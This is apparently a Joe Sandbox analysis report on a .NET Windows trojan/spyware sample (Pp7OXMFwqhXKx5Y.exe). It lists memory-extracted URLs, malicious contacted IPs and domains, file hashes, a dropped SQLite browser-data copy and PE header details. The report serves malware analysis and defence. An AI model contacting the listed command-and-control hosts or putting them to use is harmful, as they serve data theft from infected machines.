                                                                                                                                                                        https://delivery.consentmanager.netRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icocacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYXcacls.exe, 00000004.00000002.182791208626.0000000004DB4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=G8uE-69OL.4.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://dialogpriest.onlineRAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.epicurecooks.world/sk-logabpstatus.php?a=NFd0ZVVKdXZlZDdYNHJGc0I1RTNRRkVRVzhkaGNtTDd4UEdycacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.epicurecooks.world/Prospect_Epicure_J-REIT_Value_Fund.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://www.ecosia.org/newtab/cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://www.epicurecooks.world/__media__/js/trademark.php?d=epicurecooks.world&type=nsRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://hayaniya.org/vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwxRAVCpl64.exe, 00000003.00000002.183800347636.000000000837E000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000558E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://i2.cdn-image.com/__media__/pics/29590/bg1.png)RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.wesped.com/cart.php?a=add&domain=registerRAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhRAVCpl64.exe, 00000003.00000002.183800347636.0000000007880000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000004A90000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://localhost/arkanoid_server/requests.phpRAVCpl64.exe, 00000003.00000002.183800347636.0000000006B2C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000003D3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.179519526215.0000000023C6C000.00000004.80000000.00040000.00000000.sdmp, Pp7OXMFwqhXKx5Y.exefalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://gemini.google.com/app?q=cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                8.136.96.106
                                                                                                                                                                                                                                		www.juewucangku.xyzSingapore
                                                                                                                                                                                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                                                38.47.233.4
                                                                                                                                                                                                                                		nng83.topUnited States
                                                                                                                                                                                                                                		174COGENT-174UStrue
                                                                                                                                                                                                                                13.248.169.48
                                                                                                                                                                                                                                		www.smartgov.shopUnited States
                                                                                                                                                                                                                                		16509AMAZON-02UStrue
                                                                                                                                                                                                                                176.31.209.107
                                                                                                                                                                                                                                		www.dialogpriest.onlineFrance
                                                                                                                                                                                                                                		16276OVHFRtrue
                                                                                                                                                                                                                                103.224.182.242
                                                                                                                                                                                                                                		www.brickhills.siteAustralia
                                                                                                                                                                                                                                		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                                                84.32.84.32
                                                                                                                                                                                                                                		sido247.proLithuania
                                                                                                                                                                                                                                		33922NTT-LT-ASLTtrue
                                                                                                                                                                                                                                208.91.197.27
                                                                                                                                                                                                                                		www.epicurecooks.worldVirgin Islands (BRITISH)
                                                                                                                                                                                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                                                45.197.47.177
                                                                                                                                                                                                                                		www.224466.topSeychelles
                                                                                                                                                                                                                                		328608Africa-on-Cloud-ASZAtrue
                                                                                                                                                                                                                                209.74.79.42
                                                                                                                                                                                                                                		www.glowups.lifeUnited States
                                                                                                                                                                                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                                                                                                                                172.67.201.49
                                                                                                                                                                                                                                		www.goldbracelet.topUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                172.96.191.39
                                                                                                                                                                                                                                		88rtp.bizCanada
                                                                                                                                                                                                                                		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                                                192.185.147.100
                                                                                                                                                                                                                                		hayaniya.orgUnited States
                                                                                                                                                                                                                                		26337OIS1UStrue
                                                                                                                                                                                                                                217.160.0.183
                                                                                                                                                                                                                                		www.kubex.devGermany
                                                                                                                                                                                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                173.0.157.187
                                                                                                                                                                                                                                		0be.infoUnited States
                                                                                                                                                                                                                                		7979SERVERS-COMUStrue
                                                                                                                                                                                                                                89.31.143.90
                                                                                                                                                                                                                                		www.eichner.proGermany
                                                                                                                                                                                                                                		15598QSC-AG-IPXDEtrue

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1567413
                                                                                                                                                                                                                                Start date and time:2024-12-03 14:48:18 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 16m 15s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                                Run name:Suspected Instruction Hammering
                                                                                                                                                                                                                                Number of analysed new started processes analysed:5
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Sample name:Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@17/15
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 98%
                                                                                                                                                                                                                                • Number of executed functions: 83
                                                                                                                                                                                                                                • Number of non-executed functions: 252
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: Pp7OXMFwqhXKx5Y.exe

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                08:51:51API Interceptor28430839x Sleep call for process: cacls.exe modified

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Pp7OXMFwqhXKx5Y.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                                Entropy (8bit):5.354384827676232
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MLUE4K5E4K1Bs1qE4qXKDE4KhKMaKhPKIE4oKnKoZAE4KzD1E4x84j:MIHK5HK1Bs1qHiYHKh6oPtHoAhAHKzhp
                                                                                                                                                                                                                                MD5:511475387A5161D4052316C38F7FF282
                                                                                                                                                                                                                                SHA1:2CE71F7A372D6965DD42B71EEC5E8F81D43343B3
                                                                                                                                                                                                                                SHA-256:AD084A10414740C5054EDBCF76007E75F9E7456D3C7C5DA8865F0ECD491A6E61
                                                                                                                                                                                                                                SHA-512:E60E0218C46DF20260D81B7A1FBD69BF019C54E36A8ACDB74ADAB91A90BD8960ECC8E16F3872851119DA05E72787433DD3C54E099F9E6526342E05C38D5364C7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\G8uE-69OL

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):135168
                                                                                                                                                                                                                                Entropy (8bit):1.1142956103012707
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                                                                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                                                                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                                                                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                                                                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):7.805893321028564
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                File name:Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                File size:766'976 bytes
                                                                                                                                                                                                                                MD5:8a6f66334502bc3da28732ccd4353d14
                                                                                                                                                                                                                                SHA1:f51ecc0c41835d9aed80c16a8a7121ca08f9476a
                                                                                                                                                                                                                                SHA256:f6047e5b6850d495f6abb0be606099be170b94fcef640a52681490020a569bf6
                                                                                                                                                                                                                                SHA512:c58b2678afd98b6f940ee670def962b62f27bda28d0613045c5f12007e87ade470d565124ce78c417a13dc193e309ba096535217346b2603b9a2d391d87c8eb7
                                                                                                                                                                                                                                SSDEEP:12288:nxIR4R52J+XtHzP6IjvfsBpbLnvyxPNmRS8Ijn2PYI6OvnKZz0j0qqkEQjAFiIRi:xIeeqCsupbLDRS8unkYeKZ20qqkjiiI4
                                                                                                                                                                                                                                TLSH:F8F4125D5A5AE40BCE0017780EB2F2B81AAC1FDDB901D2179FDDADEBB876C241D482C1
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0..\...T......Zz... ........@.. ....................................@................................

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:033424c4c199d839

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x4b7a5a
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x674E950D [Tue Dec 3 05:20:13 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb7a080x4f.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x4ca8.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
